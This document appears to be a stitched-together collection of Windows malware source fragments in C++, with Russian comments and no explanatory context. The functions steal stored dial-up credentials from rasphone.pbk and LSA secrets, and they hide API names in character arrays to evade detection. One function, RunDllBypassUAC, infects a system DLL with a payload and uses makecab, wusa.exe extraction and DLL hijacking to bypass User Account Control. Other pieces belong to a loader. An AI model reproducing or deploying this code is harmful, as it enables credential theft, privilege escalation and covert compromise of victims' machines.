DWORD CDialupass::GetRasEntryCount() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { nCount++; } } delete lpszReturnBuffer; return nCount; }
//------------------------------------------------------------------------ PCHAR GetSignalFileName() { // Функция возвращает имя сигнального файла // Определяем системный диск char WinDir[257]; if (pGetWindowsDirectoryA(&WinDir[0], 256) == 0) return NULL; PCHAR Tmp = WinDir; while (*Tmp != ':') Tmp++; Tmp++; *Tmp = 0; // Создаём полнлё имя return STR::New(2, WinDir, (PCHAR)LoaderSignalFileName); }
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize) { CHAR path[MAX_PATH]; pGetWindowsDirectoryA(path, MAX_PATH); path[3] = '\0'; m_lstrcat(path, "ntldr"); m_memset(Buffer, 0, BufferSize); string md5 = MD5StrFromFileA(path); if (md5.IsEmpty()) return NULL; if (BufferSize < 33) return NULL; m_lstrcat(Buffer, md5.t_str()); return Buffer; }
bool RunDllBypassUAC( const LPVOID module, int szModule, int method ) { bool ret = false; //проверяем в нужной ли версии винды находимся OSVERSIONINFOA Version; Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); if( pGetVersionExA(&Version) ) { if( Version.dwPlatformId != VER_PLATFORM_WIN32_NT || Version.dwMajorVersion != 6 || !(Version.dwMinorVersion == 1 || Version.dwMinorVersion == 2) ) { return false; } } char engineDll[MAX_PATH]; File::GetTempName(engineDll); DBG( "Saving engine DLL into the '%s'", engineDll ); // write payload DLL into the temporary location if( File::WriteBufferA( engineDll, module, szModule ) != szModule ) return false; char targetDll[MAX_PATH], targetDllInfected[MAX_PATH]; pGetSystemDirectoryA( targetDll, MAX_PATH ); pPathAppendA( targetDll, uacTargetDll[method] ); pGetTempPathA( MAX_PATH, targetDllInfected ); pPathAppendA( targetDllInfected, uacTargetDll[method] ); void* data = NULL; DWORD dataSize = 0; DBG( "Reading and infecting '%s'", targetDll ); // read hijacking dll and infect it data = File::ReadToBufferA( targetDll, dataSize ); if( data ) { if( InfectImage( data, dataSize, engineDll, 0 ) ) { DBG( "Saving infected DLL to '%s'", targetDllInfected); // write infected hijacking DLL into the temporary location if( File::WriteBufferA( targetDllInfected, data, dataSize ) ) { char msuPath[MAX_PATH]; pGetTempPathA( MAX_PATH, msuPath ); pPathAppendA( msuPath, uacTargetMsu[method] ); // delete old .msu file pDeleteFileA(msuPath); DBG( "Creating MSU file '%s'", msuPath); // make .msu archive Exec( 0, "makecab.exe /V1 %s %s", targetDllInfected, msuPath); if( File::IsExists(msuPath) ) { char targetPath[MAX_PATH], targetDllPath[MAX_PATH]; pGetWindowsDirectoryA( targetPath, MAX_PATH - 1 ); pPathAppendA( targetPath, uacTargetDir[method] ); pPathAppendA( targetPath, uacTargetApp[method] ); pGetWindowsDirectoryA( targetDllPath, MAX_PATH - 1 ); pPathAppendA( targetDllPath, uacTargetDir[method] ); pPathAppendA( targetDllPath, uacTargetDll[method] ); DBG( "Extracting MSU data to '%s'", targetDllPath ); // extract dll file into the vulnerable app directory Exec(NULL, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\%s", msuPath, uacTargetDir[method] ); if( File::IsExists(targetDllPath) ) { DWORD exitCode = 0; DBG( "Executing '%s'", targetPath ); // execute vulnerable application and perform DLL hijacking attack if( Exec( &exitCode, "cmd.exe /C %s", targetPath ) ) { if( exitCode == UAC_BYPASS_MAGIC_RETURN_CODE ) { DBG( "UAC BYPASS SUCCESS" ); ret = true; } else { DBG( "UAC BYPASS FAILS" ); } } pDeleteFileA(targetDllPath); } else DBG( "Error while extracting '%s' from MSU archive", targetDllPath ); pDeleteFileA(msuPath); } else DBG( "Error while creating '%s'", msuPath ); } } MemFree(data); } pDeleteFileA(targetDllInfected); pDeleteFileA(engineDll); return ret; }
bool CDialupass::GetRasEntries() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; OSVERSIONINFO osi; osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'}; GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05); pGetVersionExA(&osi); if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5) { GetLsaPasswords(); } DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { char *lpRealSection = (char *)UTF8ToGB2312(lpSection); char strDialParamsUID[256]; char strUserName[256]; char strPassWord[256]; char strPhoneNumber[256]; char strDevice[256]; memset(strDialParamsUID, 0, sizeof(strDialParamsUID)); memset(strUserName, 0, sizeof(strUserName)); memset(strPassWord, 0, sizeof(strPassWord)); memset(strPhoneNumber, 0, sizeof(strPhoneNumber)); memset(strDevice, 0, sizeof(strDevice)); char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'}; GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04); int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]); char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'}; lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03); if (nBufferLen > 0)//DialParamsUID=4326020 198064 { for(int j=0; j< (int)m_nRasCount; j++) { if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0) { plstrcpyA(strUserName, m_PassWords[j].login); plstrcpyA(strPassWord, m_PassWords[j].pass); m_PassWords[j].used=true; m_nUsed++; break; } } } pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]); pGetPrivateProfileStringA(lpSection, "Device", 0, strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]); char *lpRealDevice = (char *)UTF8ToGB2312(strDevice); char *lpRealUserName = (char *)UTF8ToGB2312(strUserName); Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord, strPhoneNumber, lpRealDevice); // delete lpRealSection; // delete lpRealUserName; // delete lpRealDevice; } } delete lpszReturnBuffer; return true; }